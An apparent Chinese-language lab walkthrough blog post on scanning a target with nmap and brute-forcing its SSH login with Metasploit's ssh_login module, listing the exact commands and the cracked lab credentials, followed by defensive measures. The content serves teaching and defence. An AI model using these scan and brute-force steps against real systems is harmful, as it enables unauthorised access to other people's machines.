2018-08-07 web渗透(一)

理论

   nmap 扫描存活主机 命令:nmap -sP ip段 如:namp -sP 10.10.10.0/24;扫描操作系统 命令:nmap -O ip地址。扫描服务和端口 命令:nmap -sV -Pn ip地址。

    metasploit。启动命令:msfconsole。命令:search ssh,搜索ssh可利用的模块。模块使用命令,use 模块名。命令:show options,显示模块需要配置的参数。使用set threads 命令,设置扫描速度,使用命令run,开始扫描。使用back命令退出当前模块。

    ssh服务简介:SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平台,都可运行SSH。

    弱口令:弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。


实操

情报收集:

    1、使用nmap扫描靶机10.10.10.129的操作系统

    2、nmap扫描靶机开放的端口及服务

爆破过程:

    1、使用msfconsole命令打开metasploit

    2、输入命令search ssh,搜索与ssh有关的模块

    3、命令use auxiliary/scanner/ssh/ssh_login,选择ssh登录模块

    4、输入show options,查看该模块的参数

    5、输入set rhosts 10.10.10.129;set user_file ~/Desktop/user.txt;set pass_file ~/Desktop/password.txt;set threads 50;set VERBOSE true等命令,设置相应参数

    6、输入run命令,进行爆破。结果账户名为root,密码为owaspbwa

    7、使用爆破出来的账号密码,进行ssh远程登录,成功。

防护措施:

    1、不适用弱口令,密码应是8位数以上的无规则大小写字母、数字和符号的组合

    2、修改默认端口号,vim /etc/ssh/sshd_config,将Port属性的默认值22修改为其他闲置端口号,可以一定程度上防止nmap的扫描

    3、修改账户信息。修改/etc/passwd文件,新建一个账户,设置其uid、gid为0,即具有超级用户权限,然后禁用root账户的登录权限,最后将/etc/ssh/sshd_config文件中的PermitRootLogin参数的值修改为no

    4、写脚本。根据/var/log/secure文件的内容,source文件里面有很多认证失败的ip的登录信息,若同一ip失败次数超过规定次数,认为是在爆破,则把此ip记录到/etc/hosts.deny里面,封禁IP。通过crontab,每分钟执行一次脚本。

    5、安装如DenyHosts、fail2ban等的第三方防爆破软件,其原理基本同上一条的脚本一样

    6、禁用ssh服务,关闭22端口。

你可能感兴趣的:(2018-08-07 web渗透(一))